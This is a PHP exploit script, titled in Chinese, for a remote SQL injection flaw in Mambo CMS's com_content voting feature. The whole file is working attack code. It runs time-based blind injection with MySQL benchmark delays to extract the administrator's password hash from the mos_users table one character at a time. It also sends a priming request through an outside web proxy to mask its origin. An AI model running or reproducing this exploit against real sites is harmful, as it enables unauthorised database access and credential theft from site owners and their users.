Mambocom_content远程SQL注入漏洞 Exploit

*/ if (!(function_exists('curl_init'))) { echo "cURL extension required\n"; exit; } ini_set("max_execution_time","999999"); $benchcount = 150000; $aid= 62; $cid = 2; $charmap = array (48,49,50,51,52,53,54,55,56,57, 97,98,99,100,101,102, 103,104,105, 106,107,108,109,110,111,112,113, 114,115,116,117,118,119,120,121,122 ); if($argv[1]){ $url = $argv[1]; if ($argv[2]) $aid = $argv[2]; if ($argv[3]) $benchcount = $argv[3]; if ($argv[4]) $proxy = $argv[4]; } else { echo "Usage: ".$argv[0]." <URL> [userid] [benchmarkcount] [proxy]\n\n"; echo "\tURL\t URL to mambo site (ex: http://127.0.0.1)\n"; echo "\taid\t userid to get (default: 62 (admin))\n"; echo "\tbenchmarkcount\t benchmark count (default: 150000)\n"; echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n"; exit; } // rate from different ip (using http://projectbypass.com) $projectbypass = "http://projectbypass.com/nph-proxy3.cgi/010110A/"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL,$projectbypass.str_replace("://","/",$url)."/index.php?op \ tion=com_content&task=vote&id=1&Itemid=1&cid=$cid&user_rating=1"); curl_setopt($ch, \ CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch); curl_close ($ch); // standard page loading time $start = time(); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch); curl_close ($ch); $stop = time(); $sloadtime = floatval($stop - $start); echo "standard page loading =".$sloadtime."\n"; // benchmark page loading time $start = time(); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Itemid \ =1&cid=$cid&user_rating=1,rating_sum=(select+1+from+mos_users+where+if(2>1,benchmark($ \ benchcount,md5(1)),1))+where+content_id=$cid/*"); curl_setopt($ch, \ CURLOPT_RETURNTRANSFER,1); $res = curl_exec($ch); curl_close ($ch); $stop = time(); $bloadtime = floatval($stop - $start); echo "bencmark page loading =".$bloadtime."\n"; // check if SQL query failed if (ereg("DB function failed",$res)){ echo "[x] mysql < 4.1 detected - not exploitable\n"; exit(); } if ($bloadtime <= $sloadtime + 2){ echo "[x] increase your benchmark count\n"; exit(); } echo "Take your time for Teh Tarik... please wait ...\n\n"; echo "Result:\n"; echo "\tUserid = $aid\n"; echo "\tPassword Hash = "; // starting fetch password $benchcount = $benchcount*2; for($i= 1;$i< 33;$i++){ foreach ($charmap as $char){ $start = time(); echo chr($char); $ch = curl_init(); if ($proxy){ curl_setopt($ch, CURLOPT_PROXY,$proxy); } curl_setopt($ch, CURLOPT_URL,$url."/index.php?option=com_content&task=vote&id=1&Item \ id=1&cid=$cid&user_rating=1,rating_sum=(select+password+from+mos_users+where+id=$aid+a \ nd+if(ascii(substring(password,$i,1))=$char,benchmark($benchcount,md5(1)),1))+where+co \ ntent_id=$cid/*"); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $res=curl_exec ($ch); curl_close ($ch); $stop = time(); $xloadtime = floatval($stop - $start); if (floatval($xloadtime) > $bloadtime){ $hash .= chr($char); break 1; } else { echo chr(8); } if ($char == 103){ echo "\n\n\tNot Vulnerable or Something wrong occur ...\n"; exit; } } } echo "\n"; ?>